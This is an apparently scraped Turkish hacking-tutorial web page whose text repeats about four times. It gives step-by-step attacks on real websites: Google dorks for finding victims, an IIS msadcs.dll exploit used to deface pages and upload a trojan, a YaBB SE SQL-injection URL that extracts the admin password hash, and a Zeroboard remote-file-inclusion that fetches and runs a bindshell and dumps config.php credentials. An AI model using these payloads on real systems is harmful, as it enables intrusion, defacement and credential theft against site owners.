HACKEROO1 HACKEROO1































 


   
  HACKER OO1.Hacker.Dersleri-The
  WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM
 

WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM

ÖNCELİKLER EMEĞE SAYGI ARKADAŞLAR


sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.

Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- )
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI


ilk önce
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.


allinurl: /zboard/zboard.php

daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php


localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>

goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.

Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h

yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
Only registred user can see link on this forum!
Registred or Login on forum!

yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip

yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl

localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- )
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya;

6- onu su sekilde yaz;

e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
ilk önce
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.
allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor

Linux

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için :

write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php

localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>

goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor

2- )
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.

burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.

Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h

yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip

yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl

localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- )
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;

e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI

de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.


allinurl: /zboard/zboard.php

daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde :

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için :

write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php


localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>

goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :

bu adreslerde de işe yarıyor

2- )
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.

orn:
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.

Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h

yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip

c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl

localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- )
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya;

6- onu su sekilde yaz;

e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI


ilk önce de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.


allinurl: /zboard/zboard.php

daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor


2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde :


/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.


/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz..../Link
 

 
 
(HACKEROO1)
Sitede yayınlanan yazılar ve bilgiler izinsiz kullanılamaz.
Sitede sunulan programları kurmadan/çalıştırmadan önce virüs taramasından geçiriniz.
Programların kullanımları sonucu oluşabilecek zararlardan hackeroo1 sorum lu degildir.


Yasal Uyarı

Bu site ismi verilen dosyaların kendilerini barındırmamaktadır ve sorumlulukları kaynaklara aittir. Hak sahibinin talebi durumunda derhal sitemizden kaldırılacaktır. Sitede verilen linklerin yasalara aykırı kullanımı karşısında oluşabilecek hiçbir sorundan
HACKEROO1.TR.GG Sorumlu DEĞİLDİR
 
 
 
ANA SAYFA
CANLI
FOTO GALERİ
ÜYELİK
VİDEO
FORUM PAYLAŞIM
E-BÜLTEN
ZİYARETCİ DEFTERİ
SAYAC
PROGRAMLAR
OYUNLAR İNDİR
HACK HABERLERİ
SİTE MAP
ONLANE POHOTOSOP
LİNK LİSTESİ
TOP LİSTE
SAKLI SAYFALAR
ONLAYNE OYUN
TR.GG BUTONLARI
CSS TASARIMLARI
ÖZEL TR.GG TASARIMLARI
YENİ CSS TASARILARI
ARKAPLAN KODLARI
WEP SİTE YARDIM
WEP SİTE YARDIM 2
ONLANE PHOTOSOP
SOHBET ODASI
CANLI TV İZLE
TURBO YARIŞ
Programlar
Haberler
Eğlence
Sizden Gelenler
Canlı Yayın
Arşiv
Sende Gönder
Radyo Dinle
Gündem
Dünya
Ekonomi
Yaşam
Spor
Magazin
Sağlık
Kültür Sanat
Teknoloji
Foto Galeri
Haber
Fan
İlan
Oyun
Tartışıyorum
Web Tv




SİTEMİZ DAHA BAKIM VE TASARIM AŞAMASINDA COK DAHA FAZLA İCERİK EKLENECEKTİR
Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol